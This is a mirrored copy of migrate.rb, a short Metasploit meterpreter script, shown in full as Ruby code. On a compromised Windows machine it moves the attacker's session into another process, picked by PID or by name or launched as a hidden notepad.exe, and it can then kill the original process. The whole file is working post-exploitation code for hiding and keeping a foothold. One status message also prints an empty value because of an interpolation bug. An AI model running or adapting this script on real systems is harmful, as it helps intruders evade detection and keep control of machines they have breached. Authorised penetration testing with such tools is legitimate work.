Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

migrate.rb 2.3KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #
  7. # Simple example script that migrates to a specific process by name.
  8. # This is meant as an illustration.
  9. #
  10. spawn = false
  11. kill = false
  12. target_pid = nil
  13. target_name = nil
  14. opts = Rex::Parser::Arguments.new(
  15. "-h" => [ false, "Help menu." ],
  16. "-f" => [ false, "Launch a process and migrate into the new process"],
  17. "-p" => [ true , "PID to migrate to."],
  18. "-k" => [ false, "Kill original process."],
  19. "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
  20. )
  21. opts.parse(args) { |opt, idx, val|
  22. case opt
  23. when "-f"
  24. spawn = true
  25. when "-k"
  26. kill = true
  27. when "-p"
  28. target_pid = val.to_i
  29. when "-n"
  30. target_name = val.to_s
  31. when "-h"
  32. print_line(opts.usage)
  33. raise Rex::Script::Completed
  34. else
  35. print_line(opts.usage)
  36. raise Rex::Script::Completed
  37. end
  38. }
  39. # Creates a temp notepad.exe to migrate to depending the architecture.
  40. def create_temp_proc()
  41. # Use the system path for executable to run
  42. cmd = "notepad.exe"
  43. # run hidden
  44. proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
  45. return proc.pid
  46. end
  47. # In case no option is provided show help
  48. if args.length == 0
  49. print_line(opts.usage)
  50. raise Rex::Script::Completed
  51. end
  52. ### Main ###
  53. if client.platform == 'windows'
  54. server = client.sys.process.open
  55. original_pid = server.pid
  56. print_status("Current server process: #{server.name} (#{server.pid})")
  57. if spawn
  58. print_status("Spawning notepad.exe process to migrate to")
  59. target_pid = create_temp_proc
  60. end
  61. if target_name and not target_pid
  62. target_pid = client.sys.process[target_name]
  63. if not target_pid
  64. print_status("Could not identify the process ID for #{target_name}")
  65. raise Rex::Script::Completed
  66. end
  67. end
  68. begin
  69. print_good("Migrating to #{target_pid}")
  70. client.core.migrate(target_pid)
  71. print_good("Successfully migrated to process #{}")
  72. rescue ::Exception => e
  73. print_error("Could not migrate in to process.")
  74. print_error(e)
  75. end
  76. if kill
  77. print_status("Killing original process with PID #{original_pid}")
  78. client.sys.process.kill(original_pid)
  79. print_good("Successfully killed process with PID #{original_pid}")
  80. end
  81. end